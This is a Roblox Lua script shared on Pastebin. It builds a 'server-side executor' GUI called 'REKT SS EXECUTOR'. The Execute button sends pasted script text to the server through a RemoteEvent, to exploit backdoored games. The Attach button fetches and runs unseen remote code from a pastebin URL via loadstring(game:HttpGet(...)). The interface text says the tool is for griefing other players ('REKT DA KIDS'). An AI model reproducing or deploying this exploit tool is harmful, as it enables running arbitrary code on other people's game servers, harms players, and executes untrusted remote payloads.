Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- -- Gui to Lua
- -- Version: 3.2
- -- Instances:
- local ExecutorSS = Instance.new("ScreenGui")
- local MainSS = Instance.new("Frame")
- local TitleSS = Instance.new("TextLabel")
- local ExecuteSS = Instance.new("TextButton")
- local ClearSS = Instance.new("TextButton")
- local CheckSS = Instance.new("TextButton")
- local ScriptSS = Instance.new("TextBox")
- local MessageSS = Instance.new("Frame")
- local MessageTEXTSS = Instance.new("TextLabel")
- --Properties:
- ExecutorSS.Name = "ExecutorSS"
- ExecutorSS.Parent = game.CoreGui
- ExecutorSS.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
- ExecutorSS.ResetOnSpawn = false
- MainSS.Name = "MainSS"
- MainSS.Parent = ExecutorSS
- MainSS.Active = true
- MainSS.BackgroundColor3 = Color3.fromRGB(75, 75, 75)
- MainSS.BorderSizePixel = 0
- MainSS.Position = UDim2.new(0.0534521192, 0, 0.13846153, 0)
- MainSS.Size = UDim2.new(0, 598, 0, 329)
- MainSS.Draggable = true
- TitleSS.Name = "TitleSS"
- TitleSS.Parent = MainSS
- TitleSS.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
- TitleSS.BackgroundTransparency = 1.000
- TitleSS.Size = UDim2.new(0, 598, 0, 43)
- TitleSS.Font = Enum.Font.SourceSansBold
- TitleSS.Text = "REKT SS EXECUTOR"
- TitleSS.TextColor3 = Color3.fromRGB(181, 181, 181)
- TitleSS.TextScaled = true
- TitleSS.TextSize = 14.000
- TitleSS.TextWrapped = true
- ExecuteSS.Name = "ExecuteSS"
- ExecuteSS.Parent = MainSS
- ExecuteSS.BackgroundColor3 = Color3.fromRGB(130, 130, 130)
- ExecuteSS.Position = UDim2.new(0.0836120471, 0, 0.772036433, 0)
- ExecuteSS.Size = UDim2.new(0, 105, 0, 44)
- ExecuteSS.Font = Enum.Font.SourceSans
- ExecuteSS.Text = "Execute"
- ExecuteSS.TextColor3 = Color3.fromRGB(66, 66, 66)
- ExecuteSS.TextScaled = true
- ExecuteSS.TextSize = 14.000
- ExecuteSS.TextStrokeTransparency = 0.000
- ExecuteSS.TextWrapped = true
- ClearSS.Name = "ClearSS"
- ClearSS.Parent = MainSS
- ClearSS.BackgroundColor3 = Color3.fromRGB(130, 130, 130)
- ClearSS.Position = UDim2.new(0.295986623, 0, 0.772036433, 0)
- ClearSS.Size = UDim2.new(0, 105, 0, 44)
- ClearSS.Font = Enum.Font.SourceSans
- ClearSS.Text = "Clear"
- ClearSS.TextColor3 = Color3.fromRGB(66, 66, 66)
- ClearSS.TextScaled = true
- ClearSS.TextSize = 14.000
- ClearSS.TextStrokeTransparency = 0.000
- ClearSS.TextWrapped = true
- CheckSS.Name = "CheckSS"
- CheckSS.Parent = MainSS
- CheckSS.BackgroundColor3 = Color3.fromRGB(130, 130, 130)
- CheckSS.Position = UDim2.new(0.511705697, 0, 0.772036433, 0)
- CheckSS.Size = UDim2.new(0, 105, 0, 44)
- CheckSS.Font = Enum.Font.SourceSans
- CheckSS.Text = "Attach"
- CheckSS.TextColor3 = Color3.fromRGB(66, 66, 66)
- CheckSS.TextScaled = true
- CheckSS.TextSize = 14.000
- CheckSS.TextStrokeTransparency = 0.000
- CheckSS.TextWrapped = true
- ScriptSS.Name = "ScriptSS"
- ScriptSS.Parent = MainSS
- ScriptSS.BackgroundColor3 = Color3.fromRGB(40, 40, 40)
- ScriptSS.BorderSizePixel = 0
- ScriptSS.Position = UDim2.new(0.058528427, 0, 0.176291794, 0)
- ScriptSS.Size = UDim2.new(0, 459, 0, 179)
- ScriptSS.ClearTextOnFocus = false
- ScriptSS.Font = Enum.Font.SourceSansBold
- ScriptSS.Text = "-- PASTE THE SCRIPT AND YOU CAN REKT DA KIDS!"
- ScriptSS.TextColor3 = Color3.fromRGB(255, 255, 255)
- ScriptSS.TextSize = 15.000
- ScriptSS.TextWrapped = true
- MessageSS.Name = "MessageSS"
- MessageSS.Parent = ExecutorSS
- MessageSS.BackgroundColor3 = Color3.fromRGB(203, 203, 203)
- MessageSS.BackgroundTransparency = 0.500
- MessageSS.Position = UDim2.new(0.239420936, 0, 0.232967049, 0)
- MessageSS.Size = UDim2.new(0, 263, 0, 245)
- MessageSS.Visible = false
- MessageTEXTSS.Name = "MessageTEXTSS"
- MessageTEXTSS.Parent = MessageSS
- MessageTEXTSS.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
- MessageTEXTSS.Position = UDim2.new(0.216730043, 0, 0.212244898, 0)
- MessageTEXTSS.Size = UDim2.new(0, 150, 0, 115)
- MessageTEXTSS.Font = Enum.Font.SourceSans
- MessageTEXTSS.Text = "PRESS F9 TO SEE MESSAGE" -- SOME BROKEN STUFF XD
- MessageTEXTSS.TextColor3 = Color3.fromRGB(0, 0, 0)
- MessageTEXTSS.TextSize = 14.000
- -- Scripts:
- ExecuteSS.MouseButton1Click:connect(function()
- game.ReplicatedStorage.RemoteEvent:FireServer(ScriptSS.Text)
- end)
- ClearSS.MouseButton1Click:connect(function()
- ScriptSS.Text = ""
- end)
- CheckSS.MouseButton1Click:connect(function()
- if game.ReplicatedStorage:FindFirstChild("RemoteEvent") then
- print("THIS GAME IS SERVER-SIDED")
- else
- print("Loading Backdoor This Game Is Backdoored Not SS")
- wait(0.5)
- if not game.ReplicatedStorage:FindFirstChild("RemoteEvent") then
- wait(0.3)
- loadstring(game:HttpGet(("https://pastebin.com/raw/3BKW2FbU"), true))()
- end
- end
- end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement